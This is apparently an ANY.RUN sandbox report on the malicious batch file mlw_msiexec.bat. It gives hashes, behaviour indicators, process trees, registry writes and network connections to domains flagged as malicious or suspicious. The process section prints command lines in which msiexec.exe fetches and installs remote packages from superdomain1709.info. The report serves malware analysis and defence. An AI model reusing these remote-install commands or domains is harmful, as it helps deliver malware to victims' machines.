Malware analysis mlw_msiexec.bat Malicious activity | ANY.RUN

Add for printing

File name:	mlw_msiexec.bat
Full analysis:	https://app.any.run/tasks/29d5d556-9b8b-46aa-b83a-ca9e40d950e5
Verdict:	Malicious activity
Analysis date:	May 20, 2019, 14:34:13
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME:	text/plain
File info:	ASCII text, with CRLF line terminators
MD5:	8089B31551B33498458E0B1E585266C1
SHA1:	3E0C117CEF303BEF648CEB8B9CB5CE8E8CAB834E
SHA256:	FE3D88D5AB4D3FE56A6D311F87A8C72C0B36E4F942FE8649076197C42128BAC8
SSDEEP:	12:tPt92u926SY92Z92ghMYYciaCbyaevrCbZCbYB:tHjkgq1svJEg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 240 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: 180 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (73.0.3683.75)
Google Update Helper (1.3.33.23)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.6.1 (4.6.01055)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
No malicious indicators.
SUSPICIOUS
- Executable content was dropped or overwritten
  - msiexec.exe (PID: 3900)
  - msiexec.exe (PID: 3468)
  - msiexec.exe (PID: 1740)
  - msiexec.exe (PID: 856)
  - msiexec.exe (PID: 1352)
- Executed as Windows Service
  - vssvc.exe (PID: 2932)
- Executed via COM
  - DrvInst.exe (PID: 2384)
  - DrvInst.exe (PID: 1256)
  - DrvInst.exe (PID: 3476)
  - DrvInst.exe (PID: 1484)
- Application launched itself
  - taskmgr.exe (PID: 3144)
INFO
- Low-level read access rights to disk partition
  - vssvc.exe (PID: 2932)
- Changes settings of System certificates
  - DrvInst.exe (PID: 2384)
- Loads dropped or rewritten executable
  - MsiExec.exe (PID: 2956)
  - MsiExec.exe (PID: 2456)
  - MsiExec.exe (PID: 352)
  - MsiExec.exe (PID: 2568)
  - MsiExec.exe (PID: 3364)
  - MsiExec.exe (PID: 2908)
  - MsiExec.exe (PID: 3652)
- Writes to a desktop.ini file (may be used to cloak folders)
  - msiexec.exe (PID: 3468)
- Searches for installed software
  - msiexec.exe (PID: 3468)
- Adds / modifies Windows certificates
  - DrvInst.exe (PID: 2384)
- Application launched itself
  - msiexec.exe (PID: 3468)
- Manual execution by user
  - taskmgr.exe (PID: 3144)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

352

C:\Windows\system32\MsiExec.exe -Embedding D9272454AD86347D72B1A5DB01AD15CF

C:\Windows\system32\MsiExec.exe

—

msiexec.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows® installer

Exit code:

Version:

5.0.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll

856

c:\windows\system32\msiexec.exe -package https://superdomain1709.info/kaebhgp.jng

c:\windows\system32\msiexec.exe

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows® installer

Exit code:

1603

Version:

5.0.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll

880

cmd /c ""C:\Users\admin\Desktop\mlw_msiexec.bat" "

C:\Windows\system32\cmd.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Exit code:

1603

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll

1256

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot20" "" "" "65dbac317" "00000000" "00000534" "00000064"

C:\Windows\system32\DrvInst.exe

—

svchost.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Driver Installation Module

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\drvinst.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll

1352

c:\windows\system32\msiexec.exe -package https://superdomain1709.info/oecroxyipdoecc.ryo

c:\windows\system32\msiexec.exe

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows® installer

Exit code:

1603

Version:

5.0.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll

1484

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "00000000" "000004D8" "00000304"

C:\Windows\system32\DrvInst.exe

—

svchost.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Driver Installation Module

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\drvinst.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll

1740

c:\windows\system32\msiexec.exe -package https://superdomain1709.info/geeuier.foa

c:\windows\system32\msiexec.exe

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows® installer

Exit code:

1603

Version:

5.0.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll

2336

C:\Windows\system32\MsiExec.exe -Embedding C98BFB1FBA5AF0FCA7DF51D05BA35613

C:\Windows\system32\MsiExec.exe

—

msiexec.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows® installer

Exit code:

Version:

5.0.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll

2356

"C:\Windows\system32\taskmgr.exe" /1

C:\Windows\system32\taskmgr.exe

taskmgr.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Task Manager

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\taskmgr.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll

2384

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot18" "" "" "6792c44eb" "00000000" "00000304" "000005C4"

C:\Windows\system32\DrvInst.exe

—

svchost.exe

User:

SYSTEM

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Driver Installation Module

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\drvinst.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll

Add for printing

Total events

2 003

Read events

1 091

Write events

796

Delete events

116

Modification events


(PID) Process:	(3900) msiexec.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
Operation:	write	Name:	LanguageList
Value: en-US
(PID) Process:	(3900) msiexec.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	UNCAsIntranet
Value: 0
(PID) Process:	(3900) msiexec.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	AutoDetect
Value: 1
(PID) Process:	(3900) msiexec.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASAPI32
Operation:	write	Name:	EnableFileTracing
Value: 0
(PID) Process:	(3900) msiexec.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASAPI32
Operation:	write	Name:	EnableConsoleTracing
Value: 0
(PID) Process:	(3900) msiexec.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASAPI32
Operation:	write	Name:	FileTracingMask
Value: 4294901760
(PID) Process:	(3900) msiexec.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASAPI32
Operation:	write	Name:	ConsoleTracingMask
Value: 4294901760
(PID) Process:	(3900) msiexec.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASAPI32
Operation:	write	Name:	MaxFileSize
Value: 1048576
(PID) Process:	(3900) msiexec.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASAPI32
Operation:	write	Name:	FileDirectory
Value: %windir%\tracing
(PID) Process:	(3900) msiexec.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\msiexec_RASMANCS
Operation:	write	Name:	EnableFileTracing
Value: 0

Add for printing

Executable files

Suspicious files

Text files

387

Unknown types

Dropped files

PID	Process	Filename		Type
3468	msiexec.exe	C:\System Volume Information\SPP\metadata-2		—
		MD5:—	SHA256:—
3468	msiexec.exe	C:\System Volume Information\SPP\OnlineMetadataCache\{6172b762-3bbb-461e-a4f2-f771fb492e2f}_OnDiskSnapshotProp		binary
		MD5:—	SHA256:—
2384	DrvInst.exe	C:\Windows\INF\setupapi.ev3		binary
		MD5:—	SHA256:—
3468	msiexec.exe	C:\System Volume Information\SPP\snapshot-2		binary
		MD5:—	SHA256:—
3468	msiexec.exe	C:\Users\admin\AppData\Local\Temp\~DF0F5D5D757B33C435.TMP		—
		MD5:—	SHA256:—
3468	msiexec.exe	C:\Config.Msi\1262f9.rbs		—
		MD5:—	SHA256:—
3468	msiexec.exe	C:\Users\admin\AppData\Local\Temp\~DF877D7ABEA335232A.TMP		—
		MD5:—	SHA256:—
2932	vssvc.exe	C:		—
		MD5:—	SHA256:—
3468	msiexec.exe	C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\desktop.ini		ini
		MD5:4A3DEB274BB5F0212C2419D3D8D08612	SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
3468	msiexec.exe	C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\FCMOX9ZM\desktop.ini		ini
		MD5:4A3DEB274BB5F0212C2419D3D8D08612	SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

No HTTP requests

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
3900	msiexec.exe	104.18.53.93:443	refreshnerer711rb.info	Cloudflare Inc	US	shared
3468	msiexec.exe	104.18.53.93:443	refreshnerer711rb.info	Cloudflare Inc	US	shared
3900	msiexec.exe	104.18.56.47:443	superdomain711.info	Cloudflare Inc	US	shared
3468	msiexec.exe	104.18.56.47:443	superdomain711.info	Cloudflare Inc	US	shared
1740	msiexec.exe	104.27.161.100:443	superdomain1709.info	Cloudflare Inc	US	shared
3468	msiexec.exe	104.18.52.207:443	refreshnerer711.info	Cloudflare Inc	US	shared
3468	msiexec.exe	104.27.161.100:443	superdomain1709.info	Cloudflare Inc	US	shared
856	msiexec.exe	104.27.161.100:443	superdomain1709.info	Cloudflare Inc	US	shared
1352	msiexec.exe	104.27.161.100:443	superdomain1709.info	Cloudflare Inc	US	shared

DNS requests

Domain	IP	Reputation
refreshnerer711rb.info	104.18.53.93 104.18.52.93	malicious
superdomain711.info	104.18.56.47 104.18.57.47	suspicious
superdomain1709.info	104.27.161.100 104.27.160.100	unknown
refreshnerer711.info	104.18.52.207 104.18.53.207	suspicious

Threats

No threats detected

Add for printing

No debug info

General Info

mlw_msiexec.bat

8089B31551B33498458E0B1E585266C1

3E0C117CEF303BEF648CEB8B9CB5CE8E8CAB834E

FE3D88D5AB4D3FE56A6D311F87A8C72C0B36E4F942FE8649076197C42128BAC8

12:tPt92u926SY92Z92ghMYYciaCbyaevrCbZCbYB:tHjkgq1svJEg

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

SUSPICIOUS

Executable content was dropped or overwritten

Executed as Windows Service

Executed via COM

Application launched itself

INFO

Low-level read access rights to disk partition

Changes settings of System certificates

Loads dropped or rewritten executable

Writes to a desktop.ini file (may be used to cloak folders)

Searches for installed software

Adds / modifies Windows certificates

Application launched itself

Manual execution by user

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings